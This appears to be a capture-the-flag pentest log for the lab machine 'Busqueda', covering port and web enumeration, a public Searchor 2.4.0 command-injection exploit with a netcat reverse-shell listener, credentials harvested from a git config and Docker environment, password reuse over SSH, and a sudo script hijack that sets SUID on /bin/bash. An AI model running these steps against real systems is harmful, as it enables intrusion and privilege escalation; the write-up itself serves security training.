Busqueda

๐Ÿงช Pentest Log: {{date:2025-08-03}}

๐Ÿ” Target Information

ip=10.129.161.159

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

feroxbuster --url http://$ip

wpscan -url http://$ip

dirsearch -u http://$ip -r -o dirsearch.txt

found

Powered by Flask and Searchor 2.4.0

Google 'searcher 2.4 0 exploit', found

https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection

nc -lvnp 9001

./exploit.sh http://searcher.htb 10.10.14.25

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

Git:

cat .git/config

found

url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git

Reuse the password, we successfully ssh in with svc

ssh svc@$ip

Sudo:

sudo -l

found

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' 960873171e2e

put the output data to jq, then found another password

      "GITEA__database__NAME=gitea",
      "GITEA__database__USER=gitea",
      "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",

go to gitea.searcher.htb, login as administrator with the password just found, we are able to view the system-checkup.py source code

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

cd /tmp
vim full-checkup.sh

#! /bin/bash

chmod +s /bin/bash

sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

bash -p